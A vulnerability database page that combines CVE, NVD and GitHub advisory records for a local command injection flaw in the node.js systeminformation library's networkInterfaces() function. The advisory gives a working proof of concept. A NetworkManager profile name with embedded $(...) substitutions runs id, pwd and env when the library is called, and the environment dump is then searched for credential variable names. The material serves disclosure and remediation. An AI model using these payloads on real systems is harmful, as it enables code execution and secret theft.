Vulnerability-Lookup

CVE-2026-44724 (GCVE-0-2026-44724)

Vulnerability from cvelistv5 – Published: 2026-05-27 19:26 – Updated: 2026-05-27 19:26

Title

systeminformation: Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name

Summary

systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6.

Severity

7.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/sebhildebrandt/systeminformati…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
sebhildebrandt	systeminformation	Affected: >= 4.17.0, < 5.31.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "systeminformation",
          "vendor": "sebhildebrandt",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.17.0, \u003c 5.31.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-27T19:26:28.392Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
        }
      ],
      "source": {
        "advisory": "GHSA-hvx9-hwr7-wjj9",
        "discovery": "UNKNOWN"
      },
      "title": "systeminformation: Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44724",
    "datePublished": "2026-05-27T19:26:28.392Z",
    "dateReserved": "2026-05-07T18:04:17.308Z",
    "dateUpdated": "2026-05-27T19:26:28.392Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-44724",
      "date": "2026-05-29",
      "epss": "0.00051",
      "percentile": "0.16353"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-44724\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-27T20:16:37.617\",\"lastModified\":\"2026-05-27T20:16:37.617\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"references\":[{\"url\":\"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-44724

Vulnerability from fkie_nvd - Published: 2026-05-27 20:16 - Updated: 2026-05-27 20:16

Severity

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "systeminformation is a System and OS information library for node.js. From 4.17.0 to 5.31.5, on Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters. The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync(). This vulnerability is fixed in 5.31.6."
    }
  ],
  "id": "CVE-2026-44724",
  "lastModified": "2026-05-27T20:16:37.617",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "HIGH",
          "baseScore": 7.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-27T20:16:37.617",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-HVX9-HWR7-WJJ9

Vulnerability from github – Published: 2026-05-13 15:29 – Updated: 2026-05-13 15:29

Summary

Systeminformation vulnerable to Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name

Details

Summary

On Linux, systeminformation is vulnerable to command injection in networkInterfaces() when an active NetworkManager connection profile name contains shell metacharacters.

This is not caused by a caller passing attacker-controlled arguments into networkInterfaces(). The vulnerable value is obtained internally from real nmcli device status output. The library sanitizes the network interface name before using it in shell commands, but it does not apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized connectionName is then interpolated into three shell command strings executed through execSync().

This issue was validated locally against real NetworkManager and real nmcli. Calling only:

require('./lib').networkInterfaces()

was enough to trigger execution. The injected command ran with the privileges of the calling Node.js process.

Affected Component & Versions

Affected component:

lib/network.js
networkInterfaces()
Linux NetworkManager / nmcli handling

Impact & Threat Model

Confirmed impact:

An attacker who can create or rename an active NetworkManager connection profile can execute arbitrary shell commands when a Node.js process using systeminformation calls networkInterfaces().

Confirmed realistic affected deployments include:

local inventory agents
monitoring agents
diagnostics tools
admin dashboard backends collecting host information
privileged local desktop or device-management agents

If such a process runs with elevated privileges, the injected command executes with those same elevated privileges.

Confirmed facts:

The payload was stored as a real NetworkManager connection profile name.
Real nmcli device status returned the name unchanged.
networkInterfaces() parsed that value and reused it in shell commands.
The injected command ran as the calling Node.js process.
Environment key categories were reachable from the injected process context.

Not claimed:

No remote exploitation claim is made.
No AV:N or AV:A claim is made.
No SSID-to-connection-name attack path is claimed.
File-delivery-only .nmconnection import was not confirmed as a remote or unauthenticated path.

Root Cause Analysis

The root cause is inconsistent trust handling between the Linux interface name and the NetworkManager connection profile name.

The interface name is sanitized before it is embedded into shell commands:

const iface = dev.split(':')[0].trim();
const s = util.isPrototypePolluted() ? '---' : util.sanitizeShellString(iface);

However, the NetworkManager connection name is parsed from command output and later reused without equivalent sanitization:

const connectionNameLines = resultFormat.split(' ').slice(3);
const connectionName = connectionNameLines.join(' ');
return connectionName !== '--' ? connectionName : '';

That is unsafe because NetworkManager profile names can contain shell metacharacters. Quoting the value inside "${connectionName}" does not make it safe. A connection name containing ", $(), ;, backticks, or similar shell syntax can break out of the intended argument context or trigger command substitution.

The vulnerable code executes through execSync(), which invokes a shell for command strings. As a result, interpolating connectionName into the command string creates a command-injection sink.

Exact Code Flow & File Paths

Source: lib/network.js:538-544

function getLinuxIfaceConnectionName(interfaceName) {
  const cmd = `nmcli device status 2>/dev/null | grep ${interfaceName}`;

  try {
    const result = execSync(cmd, util.execOptsLinux).toString();
    const resultFormat = result.replace(/\s+/g, ' ').trim();
    const connectionNameLines = resultFormat.split(' ').slice(3);

The parsed value is then returned as connectionName.

Trigger: lib/network.js:987-991

lines = execSync(cmd, util.execOptsLinux).toString().split('\n');
const connectionName = getLinuxIfaceConnectionName(ifaceSanitized);
dhcp = getLinuxIfaceDHCPstatus(ifaceSanitized, connectionName, _dhcpNics);
dnsSuffix = getLinuxIfaceDNSsuffix(connectionName);
ieee8021xAuth = getLinuxIfaceIEEE8021xAuth(connectionName);

Sink 1: lib/network.js:620

const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.method;`;

Sink 2: lib/network.js:660

const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep ipv4.dns-search;`;

Sink 3: lib/network.js:676

const cmd = `nmcli connection show "${connectionName}" 2>/dev/null | grep 802-1x.eap;`;

There are three distinct exploitable connectionName sinks.

Proof of Concept (PoC) & Reproduction Steps

The following PoC is harmless and local-only. It uses a dummy NetworkManager connection and writes proof files under /tmp.

Run from the project root:

cd /path/to/systeminformation

Confirm proof files do not already exist:

test -e /tmp/si-nm-id-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-pwd-proof && echo EXISTS || echo NOT_YET
test -e /tmp/si-nm-env-proof && echo EXISTS || echo NOT_YET

Create a malicious NetworkManager dummy profile:

nmcli connection add type dummy ifname si-nmghsa0 con-name 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'

Assign a documentation-only address so Node’s os.networkInterfaces() sees the dummy interface:

nmcli connection modify 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)' \
  ipv4.method manual \
  ipv4.addresses 192.0.2.253/32 \
  ipv6.method disabled

Activate the profile:

nmcli connection up 'si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)'

Confirm real nmcli exposes the malicious connection name unchanged:

nmcli device status | grep si-nmghsa0

Expected relevant output includes the active connection name:

si-nmghsa0  dummy  connected  si-ghsa$(id>/tmp/si-nm-id-proof)$(pwd>/tmp/si-nm-pwd-proof)$(env>/tmp/si-nm-env-proof)

Trigger the vulnerable library path with no attacker-controlled function argument:

node -e "const si=require('./lib'); si.networkInterfaces().then((interfaces)=>{const item=interfaces.find((entry)=>entry.iface==='si-nmghsa0'); console.log('saw_dummy_iface=' + Boolean(item)); if (item)
console.log(JSON.stringify({iface:item.iface, ip4:item.ip4, dhcp:item.dhcp, dnsSuffix:item.dnsSuffix, ieee8021xAuth:item.ieee8021xAuth}));}).catch((e)=>{console.error(e); process.exit(1);});"

Confirm command execution:

test -e /tmp/si-nm-id-proof && echo CONFIRMED || echo FAILED
cat /tmp/si-nm-id-proof
cat /tmp/si-nm-pwd-proof

Inspect environment key categories without printing secret values:

node -e "
const fs=require('fs');
const keys=fs.readFileSync('/tmp/si-nm-env-proof','utf8')
  .split(/\n/).map(l=>l.split('=')[0]).filter(Boolean);
const wanted=['PATH','USER','HOME','SHELL','PWD','SSH_AUTH_SOCK','GITHUB_TOKEN','NPM_TOKEN','AWS_ACCESS_KEY_ID'];
console.log('env_key_count='+keys.length);
console.log('present_categories='+wanted.filter(k=>keys.includes(k)).join(','));
"

validated evidence:

saw_dummy_iface=true
uid=1000(smart) gid=1000(smart)
pwd=/home/smart/Downloads/systeminformation-master
env_key_count=74
present_categories=PATH,USER,HOME,SHELL,PWD,SSH_AUTH_SOCK

Local Validation Summary & Aggregate Reachability

Validation was performed against real NetworkManager and real nmcli. The primary proof did not rely on a PATH stub.

Observed behavior:

The malicious profile was accepted by NetworkManager.
The active connection name appeared unchanged in nmcli device status.
Calling only require('./lib').networkInterfaces() triggered execution.
The proof artifacts were created only after the library call.
The id output matched the calling Node.js process identity.
The pwd output matched the Node.js process working directory.
The environment proof demonstrated access to process-environment categories without printing secret values.

Aggregate API reachability:

lib/index.js:94: getStaticData() reaches network.networkInterfaces() as part of static data collection.
lib/index.js:307: getAllData() reaches getStaticData() first.

During local validation, an aggregate runtime attempt later hit an unrelated osinfo.js error in that environment. Because of that, aggregate source reachability is confirmed, but aggregate call completion was not used as the primary exploit proof.

Why This Is Not Intended Behavior

networkInterfaces() is documented and expected to return network interface metadata such as interface name, IP addresses, DHCP state, DNS suffix, and IEEE 802.1X status.

The library already shows an intent to protect shell command construction by sanitizing interface names before shell use. The missing sanitization for connectionName is inconsistent with that defensive pattern.

Executing shell commands embedded in a NetworkManager profile name is not a documented feature, not required to return network metadata, and not an expected design tradeoff. This is a command injection vulnerability caused by unsafe shell-string construction.

Recommended Fix

Avoid shell interpolation entirely for NetworkManager calls.

Replace shell command strings with execFileSync() or spawnSync() using argument arrays. For example:

const { execFileSync } = require('child_process');

const output = execFileSync(
  'nmcli',
  ['connection', 'show', connectionName],
  util.execOptsLinux
).toString();

Recommended code-level changes:

Replace nmcli device status 2>/dev/null | grep ${interfaceName} with argument-array execution and filter rows in JavaScript.
Replace every nmcli connection show "${connectionName}" | grep ... shell string with argument-array execution.
Parse ipv4.method, ipv4.dns-search, and 802-1x.eap in JavaScript instead of using shell grep.
Treat NetworkManager profile names as untrusted input even though they originate from local system state.
Do not rely on quoting or escaping as the main mitigation. Argument-array execution is the correct fix.

Regression Test Ideas

Add Linux-specific tests for NetworkManager connection names containing shell metacharacters.

Suggested malicious connection names:

name$(...)
name"; ...; #
`name...```
name|...
name;...

Expected behavior after the fix:

networkInterfaces() completes without executing shell syntax from the connection name.
No marker files or equivalent side effects are produced.
The function either returns metadata for the interface or safely returns unknown/default values for fields that cannot be queried.
Tests cover all three current sink helpers:
DHCP lookup
DNS suffix lookup
IEEE 802.1x auth lookup

For unit-level coverage, mock the NetworkManager command wrapper so that nmcli device status returns a connection name containing metacharacters, then assert that subsequent calls use argument arrays rather than shell strings.

Credit request

If you publish an advisory or assign a CVE, please credit me as:

Ali Firas (thesmartshadow) - https://www.smartshadow.dev

Severity

7.8 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.31.5"
      },
      "package": {
        "ecosystem": "npm",
        "name": "systeminformation"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.17.0"
            },
            {
              "fixed": "5.31.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44724"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-13T15:29:21Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nOn Linux, `systeminformation` is vulnerable to command injection in `networkInterfaces()` when an **active NetworkManager connection profile name** contains shell metacharacters.\n\nThis is not caused by a caller passing attacker-controlled arguments into `networkInterfaces()`. The vulnerable value is obtained internally from real `nmcli device status` output. The library sanitizes the network interface name before using it in shell commands, but it does **not** apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized `connectionName` is then interpolated into three shell command strings executed through `execSync()`.\n\nThis issue was validated locally against **real NetworkManager** and **real `nmcli`**. Calling only:\n\n```js\nrequire(\u0027./lib\u0027).networkInterfaces()\n```\n\nwas enough to trigger execution. The injected command ran with the privileges of the calling Node.js process.\n\n## Affected Component \u0026 Versions\n\n**Affected component:**\n\n- [`lib/network.js`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js)\n- `networkInterfaces()`\n- Linux NetworkManager / `nmcli` handling\n\n\n## Impact \u0026 Threat Model\n\n**Confirmed impact:**\n\nAn attacker who can create or rename an **active NetworkManager connection profile** can execute arbitrary shell commands when a Node.js process using `systeminformation` calls `networkInterfaces()`.\n\n**Confirmed realistic affected deployments include:**\n\n- local inventory agents\n- monitoring agents\n- diagnostics tools\n- admin dashboard backends collecting host information\n- privileged local desktop or device-management agents\n\nIf such a process runs with elevated privileges, the injected command executes with those same elevated privileges.\n\n**Confirmed facts:**\n\n- The payload was stored as a real NetworkManager connection profile name.\n- Real `nmcli device status` returned the name unchanged.\n- `networkInterfaces()` parsed that value and reused it in shell commands.\n- The injected command ran as the calling Node.js process.\n- Environment key categories were reachable from the injected process context.\n\n**Not claimed:**\n\n- No remote exploitation claim is made.\n- No `AV:N` or `AV:A` claim is made.\n- No SSID-to-connection-name attack path is claimed.\n- File-delivery-only `.nmconnection` import was not confirmed as a remote or unauthenticated path.\n\n## Root Cause Analysis\n\nThe root cause is inconsistent trust handling between the Linux interface name and the NetworkManager connection profile name.\n\nThe interface name is sanitized before it is embedded into shell commands:\n\n```js\nconst iface = dev.split(\u0027:\u0027)[0].trim();\nconst s = util.isPrototypePolluted() ? \u0027---\u0027 : util.sanitizeShellString(iface);\n```\n\nHowever, the NetworkManager connection name is parsed from command output and later reused without equivalent sanitization:\n\n```js\nconst connectionNameLines = resultFormat.split(\u0027 \u0027).slice(3);\nconst connectionName = connectionNameLines.join(\u0027 \u0027);\nreturn connectionName !== \u0027--\u0027 ? connectionName : \u0027\u0027;\n```\n\nThat is unsafe because NetworkManager profile names can contain shell metacharacters. Quoting the value inside `\"${connectionName}\"` does not make it safe. A connection name containing `\"`, `$()`, `;`, backticks, or similar shell syntax can break out of the intended argument context or trigger command substitution.\n\nThe vulnerable code executes through `execSync()`, which invokes a shell for command strings. As a result, interpolating `connectionName` into the command string creates a command-injection sink.\n\n## Exact Code Flow \u0026 File Paths\n\n**Source:** [`lib/network.js:538-544`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L538-L544)\n\n```js\nfunction getLinuxIfaceConnectionName(interfaceName) {\n  const cmd = `nmcli device status 2\u003e/dev/null | grep ${interfaceName}`;\n\n  try {\n    const result = execSync(cmd, util.execOptsLinux).toString();\n    const resultFormat = result.replace(/\\s+/g, \u0027 \u0027).trim();\n    const connectionNameLines = resultFormat.split(\u0027 \u0027).slice(3);\n```\n\nThe parsed value is then returned as `connectionName`.\n\n**Trigger:** [`lib/network.js:987-991`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L987-L991)\n\n```js\nlines = execSync(cmd, util.execOptsLinux).toString().split(\u0027\\n\u0027);\nconst connectionName = getLinuxIfaceConnectionName(ifaceSanitized);\ndhcp = getLinuxIfaceDHCPstatus(ifaceSanitized, connectionName, _dhcpNics);\ndnsSuffix = getLinuxIfaceDNSsuffix(connectionName);\nieee8021xAuth = getLinuxIfaceIEEE8021xAuth(connectionName);\n```\n\n**Sink 1:** [`lib/network.js:620`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L620-L620)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep ipv4.method;`;\n```\n\n**Sink 2:** [`lib/network.js:660`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L660-L660)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep ipv4.dns-search;`;\n```\n\n**Sink 3:** [`lib/network.js:676`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L676-L676)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep 802-1x.eap;`;\n```\n\nThere are **three distinct exploitable `connectionName` sinks**.\n\n\n## Proof of Concept (PoC) \u0026 Reproduction Steps\n\nThe following PoC is harmless and local-only. It uses a dummy NetworkManager connection and writes proof files under /tmp.\n\nRun from the project root:\n\n```bash\ncd /path/to/systeminformation\n```\n\nConfirm proof files do not already exist:\n\n```bash\ntest -e /tmp/si-nm-id-proof \u0026\u0026 echo EXISTS || echo NOT_YET\ntest -e /tmp/si-nm-pwd-proof \u0026\u0026 echo EXISTS || echo NOT_YET\ntest -e /tmp/si-nm-env-proof \u0026\u0026 echo EXISTS || echo NOT_YET\n```\n\nCreate a malicious NetworkManager dummy profile:\n\n```bash\nnmcli connection add type dummy ifname si-nmghsa0 con-name \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027\n```\n\nAssign a documentation-only address so Node\u2019s os.networkInterfaces() sees the dummy interface:\n\n```bash\nnmcli connection modify \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027 \\\n  ipv4.method manual \\\n  ipv4.addresses 192.0.2.253/32 \\\n  ipv6.method disabled\n```\n\nActivate the profile:\n\n```bash\nnmcli connection up \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027\n```\n\nConfirm real nmcli exposes the malicious connection name unchanged:\n\n```bash\nnmcli device status | grep si-nmghsa0\n```\n\nExpected relevant output includes the active connection name:\n\n```text\nsi-nmghsa0  dummy  connected  si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\n```\n\nTrigger the vulnerable library path with no attacker-controlled function argument:\n\n```bash\nnode -e \"const si=require(\u0027./lib\u0027); si.networkInterfaces().then((interfaces)=\u003e{const item=interfaces.find((entry)=\u003eentry.iface===\u0027si-nmghsa0\u0027); console.log(\u0027saw_dummy_iface=\u0027 + Boolean(item)); if (item)\nconsole.log(JSON.stringify({iface:item.iface, ip4:item.ip4, dhcp:item.dhcp, dnsSuffix:item.dnsSuffix, ieee8021xAuth:item.ieee8021xAuth}));}).catch((e)=\u003e{console.error(e); process.exit(1);});\"\n```\n\nConfirm command execution:\n\n```bash\ntest -e /tmp/si-nm-id-proof \u0026\u0026 echo CONFIRMED || echo FAILED\ncat /tmp/si-nm-id-proof\ncat /tmp/si-nm-pwd-proof\n```\n\nInspect environment key categories without printing secret values:\n\n```bash\nnode -e \"\nconst fs=require(\u0027fs\u0027);\nconst keys=fs.readFileSync(\u0027/tmp/si-nm-env-proof\u0027,\u0027utf8\u0027)\n  .split(/\\n/).map(l=\u003el.split(\u0027=\u0027)[0]).filter(Boolean);\nconst wanted=[\u0027PATH\u0027,\u0027USER\u0027,\u0027HOME\u0027,\u0027SHELL\u0027,\u0027PWD\u0027,\u0027SSH_AUTH_SOCK\u0027,\u0027GITHUB_TOKEN\u0027,\u0027NPM_TOKEN\u0027,\u0027AWS_ACCESS_KEY_ID\u0027];\nconsole.log(\u0027env_key_count=\u0027+keys.length);\nconsole.log(\u0027present_categories=\u0027+wanted.filter(k=\u003ekeys.includes(k)).join(\u0027,\u0027));\n\"\n```\n\nvalidated evidence:\n\n```text\nsaw_dummy_iface=true\nuid=1000(smart) gid=1000(smart)\npwd=/home/smart/Downloads/systeminformation-master\nenv_key_count=74\npresent_categories=PATH,USER,HOME,SHELL,PWD,SSH_AUTH_SOCK\n```\n\n## Local Validation Summary \u0026 Aggregate Reachability\n\nValidation was performed against **real NetworkManager** and **real `nmcli`**. The primary proof did not rely on a PATH stub.\n\n**Observed behavior:**\n\n- The malicious profile was accepted by NetworkManager.\n- The active connection name appeared unchanged in `nmcli device status`.\n- Calling only `require(\u0027./lib\u0027).networkInterfaces()` triggered execution.\n- The proof artifacts were created only after the library call.\n- The `id` output matched the calling Node.js process identity.\n- The `pwd` output matched the Node.js process working directory.\n- The environment proof demonstrated access to process-environment categories without printing secret values.\n\n**Aggregate API reachability:**\n\n- [`lib/index.js:94`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/index.js#L94-L94): `getStaticData()` reaches `network.networkInterfaces()` as part of static data collection.\n- [`lib/index.js:307`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/index.js#L307-L307): `getAllData()` reaches `getStaticData()` first.\n\nDuring local validation, an aggregate runtime attempt later hit an unrelated `osinfo.js` error in that environment. Because of that, aggregate source reachability is confirmed, but aggregate call completion was **not** used as the primary exploit proof.\n\n## Why This Is Not Intended Behavior\n\n`networkInterfaces()` is documented and expected to return network interface metadata such as interface name, IP addresses, DHCP state, DNS suffix, and IEEE 802.1X status.\n\nThe library already shows an intent to protect shell command construction by sanitizing interface names before shell use. The missing sanitization for `connectionName` is inconsistent with that defensive pattern.\n\nExecuting shell commands embedded in a NetworkManager profile name is not a documented feature, not required to return network metadata, and not an expected design tradeoff. This is a command injection vulnerability caused by unsafe shell-string construction.\n\n## Recommended Fix\n\nAvoid shell interpolation entirely for NetworkManager calls.\n\nReplace shell command strings with `execFileSync()` or `spawnSync()` using argument arrays. For example:\n\n```js\nconst { execFileSync } = require(\u0027child_process\u0027);\n\nconst output = execFileSync(\n  \u0027nmcli\u0027,\n  [\u0027connection\u0027, \u0027show\u0027, connectionName],\n  util.execOptsLinux\n).toString();\n```\n\n**Recommended code-level changes:**\n\n- Replace `nmcli device status 2\u003e/dev/null | grep ${interfaceName}` with argument-array execution and filter rows in JavaScript.\n- Replace every `nmcli connection show \"${connectionName}\" | grep ...` shell string with argument-array execution.\n- Parse `ipv4.method`, `ipv4.dns-search`, and `802-1x.eap` in JavaScript instead of using shell `grep`.\n- Treat NetworkManager profile names as untrusted input even though they originate from local system state.\n- Do not rely on quoting or escaping as the main mitigation. Argument-array execution is the correct fix.\n\n## Regression Test Ideas\n\nAdd Linux-specific tests for NetworkManager connection names containing shell metacharacters.\n\n**Suggested malicious connection names:**\n\n- `name$(...)`\n- `name\"; ...; #`\n- ``name`...``` \n- `name|...`\n- `name;...`\n\n**Expected behavior after the fix:**\n\n- `networkInterfaces()` completes without executing shell syntax from the connection name.\n- No marker files or equivalent side effects are produced.\n- The function either returns metadata for the interface or safely returns unknown/default values for fields that cannot be queried.\n- Tests cover all three current sink helpers:\n  - DHCP lookup\n  - DNS suffix lookup\n  - IEEE 802.1x auth lookup\n\nFor unit-level coverage, mock the NetworkManager command wrapper so that `nmcli device status` returns a connection name containing metacharacters, then assert that subsequent calls use argument arrays rather than shell strings.\n\n## Credit request\nIf you publish an advisory or assign a CVE, please credit me as:\n\nAli Firas (thesmartshadow)  - https://www.smartshadow.dev",
  "id": "GHSA-hvx9-hwr7-wjj9",
  "modified": "2026-05-13T15:29:21Z",
  "published": "2026-05-13T15:29:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sebhildebrandt/systeminformation"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sebhildebrandt/systeminformation/releases/tag/v5.31.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Systeminformation vulnerable to Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name"
}

